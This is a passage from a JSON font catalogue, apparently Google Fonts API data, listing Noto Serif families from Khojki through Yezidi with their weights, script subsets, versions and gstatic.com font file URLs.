Khojki\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"khojki\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-11-18\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifkhojki/v5/I_uHMoOduATTei9aP90ctmPGxP2rBKTM4mcQ5M3z9QMY0ghvyZ0Qtc5HAQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifkhojki/v5/I_uHMoOduATTei9aP90ctmPGxP2rBKTM4mcQ5M3z9QMY4AhvyZ0Qtc5HAQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifkhojki/v5/I_uHMoOduATTei9aP90ctmPGxP2rBKTM4mcQ5M3z9QMYDA9vyZ0Qtc5HAQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifkhojki/v5/I_uHMoOduATTei9aP90ctmPGxP2rBKTM4mcQ5M3z9QMYNQ9vyZ0Qtc5HAQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Lao\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"lao\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VeMLrvOjlmyhHHQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VWMKrvOjlmyhHHQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8Vb0KrvOjlmyhHHQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VeMKrvOjlmyhHHQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VdEKrvOjlmyhHHQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VT0NrvOjlmyhHHQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VQQNrvOjlmyhHHQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VWMNrvOjlmyhHHQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VUoNrvOjlmyhHHQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Malayalam\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"malayalam\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1t-1fnVwHpQVySg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1N-xfnVwHpQVySg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL16exfnVwHpQVySg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1t-xfnVwHpQVySg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1hexfnVwHpQVySg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1aetfnVwHpQVySg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1UOtfnVwHpQVySg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1N-tfnVwHpQVySg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1HutfnVwHpQVySg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Myanmar\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"myanmar\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifmyanmar/v13/VuJudM7F2Yv76aBKKs-bHMQfAHUw3jnNwBDsU9X6RPzQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifmyanmar/v13/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNbDHMefv2TeXJng.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifmyanmar/v13/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNCDLMefv2TeXJng.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifmyanmar/v13/VuJsdM7F2Yv76aBKKs-bHMQfAHUw3jn1pBrocdDqRA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifmyanmar/v13/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNUDPMefv2TeXJng.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifmyanmar/v13/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNfDTMefv2TeXJng.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifmyanmar/v13/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNGDXMefv2TeXJng.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifmyanmar/v13/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNBDbMefv2TeXJng.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifmyanmar/v13/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNIDfMefv2TeXJng.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif NP Hmong\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"nyiakeng-puachue-hmong\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifnphmong/v1/pONN1gItFMO79E4L1GPUi-2sixKHZyFj9Jy6_KhXPwzdvbjPhFLp3u0rVO-d.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifnphmong/v1/pONN1gItFMO79E4L1GPUi-2sixKHZyFj9Jy6_KhXPwzdvbj9hFLp3u0rVO-d.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifnphmong/v1/pONN1gItFMO79E4L1GPUi-2sixKHZyFj9Jy6_KhXPwzdvbgRg1Lp3u0rVO-d.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifnphmong/v1/pONN1gItFMO79E4L1GPUi-2sixKHZyFj9Jy6_KhXPwzdvbgog1Lp3u0rVO-d.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Oriya\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"oriya\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notoseriforiya/v2/MjQQmj56u-r69izk_LDqWN7w0cYByutv9qeWYrvLaxrc_Hy-v039MF1j.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoseriforiya/v2/MjQQmj56u-r69izk_LDqWN7w0cYByutv9qeWYrvLaxru_Hy-v039MF1j.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoseriforiya/v2/MjQQmj56u-r69izk_LDqWN7w0cYByutv9qeWYrvLaxoC-3y-v039MF1j.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoseriforiya/v2/MjQQmj56u-r69izk_LDqWN7w0cYByutv9qeWYrvLaxo7-3y-v039MF1j.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif SC\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"chinese-simplified\",\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7mm63SzZBEtERe7U.otf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7mgq0SzZBEtERe7U.otf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifsc/v22/H4chBXePl9DZ0Xe7gG9cyOj7oqCcbzhqDtg.otf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7mlK1SzZBEtERe7U.otf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7mn6ySzZBEtERe7U.otf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7mhqzSzZBEtERe7U.otf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7miKxSzZBEtERe7U.otf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Sinhala\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"sinhala\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pGxRlMsxaLRn3W-.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pExR1MsxaLRn3W-.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pHvR1MsxaLRn3W-.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pGxR1MsxaLRn3W-.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pGDR1MsxaLRn3W-.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pFvQFMsxaLRn3W-.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pFWQFMsxaLRn3W-.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pExQFMsxaLRn3W-.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pEYQFMsxaLRn3W-.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif TC\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"chinese-traditional\",\n        \"latin\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0Bvr8vbX9GTsoOAX4.otf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0BvtssbX9GTsoOAX4.otf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoseriftc/v23/XLYgIZb5bJNDGYxLBibeHZ0BhnEESXFtUsM.otf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0BvoMtbX9GTsoOAX4.otf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0Bvq8qbX9GTsoOAX4.otf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0BvssrbX9GTsoOAX4.otf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0BvvMpbX9GTsoOAX4.otf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Tamil\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecattN6R8Pz3v8Etew.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatNN-R8Pz3v8Etew.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecat6t-R8Pz3v8Etew.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecattN-R8Pz3v8Etew.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatht-R8Pz3v8Etew.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatatiR8Pz3v8Etew.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatU9iR8Pz3v8Etew.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatNNiR8Pz3v8Etew.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatHdiR8Pz3v8Etew.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJx5svbzncQ9e3wx.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJz5s_bzncQ9e3wx.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJwns_bzncQ9e3wx.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJx5s_bzncQ9e3wx.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJxLs_bzncQ9e3wx.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJyntPbzncQ9e3wx.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJyetPbzncQ9e3wx.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJz5tPbzncQ9e3wx.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJzQtPbzncQ9e3wx.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Tangut\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"tangut\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notoseriftangut/v15/xn76YGc72GKoTvER4Gn3b4m9Ern7Em41fcvN2KT4.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Telugu\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"telugu\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9D9TGwuY2fjgrZYA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DdTCwuY2fjgrZYA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DqzCwuY2fjgrZYA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9D9TCwuY2fjgrZYA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DxzCwuY2fjgrZYA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DKzewuY2fjgrZYA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DEjewuY2fjgrZYA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DdTewuY2fjgrZYA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DXDewuY2fjgrZYA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Thai\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0oiFuRRCmsdu0Qx.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0qiF-RRCmsdu0Qx.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0p8F-RRCmsdu0Qx.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0oiF-RRCmsdu0Qx.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0oQF-RRCmsdu0Qx.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0r8EORRCmsdu0Qx.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0rFEORRCmsdu0Qx.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0qiEORRCmsdu0Qx.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0qLEORRCmsdu0Qx.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Tibetan\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tibetan\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoseriftibetan/v18/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIrYdPS7rdSy_32c.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoseriftibetan/v18/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIjYcPS7rdSy_32c.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoseriftibetan/v18/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIugcPS7rdSy_32c.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoseriftibetan/v18/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIrYcPS7rdSy_32c.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoseriftibetan/v18/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIoQcPS7rdSy_32c.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoseriftibetan/v18/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmImgbPS7rdSy_32c.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoseriftibetan/v18/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIlEbPS7rdSy_32c.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoseriftibetan/v18/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIjYbPS7rdSy_32c.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoseriftibetan/v18/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIh8bPS7rdSy_32c.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Toto\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"toto\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notoseriftoto/v1/Ktk6ALSMeZjqPnXk1rCkHYHNtwvtHItpjRP74dHhCy3Il-aj55vdNug.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoseriftoto/v1/Ktk6ALSMeZjqPnXk1rCkHYHNtwvtHItpjRP74dHhCx_Il-aj55vdNug.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoseriftoto/v1/Ktk6ALSMeZjqPnXk1rCkHYHNtwvtHItpjRP74dHhC_PPl-aj55vdNug.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoseriftoto/v1/Ktk6ALSMeZjqPnXk1rCkHYHNtwvtHItpjRP74dHhC8rPl-aj55vdNug.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Yezidi\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"yezidi\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-07-19\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifyezidi/v16/XLYPIYr5bJNDGYxLBibeHZAn3B5KJENnQjbfhMSVZspD2yEkrlGJgmVCqg.ttf\",\n        \"500\": 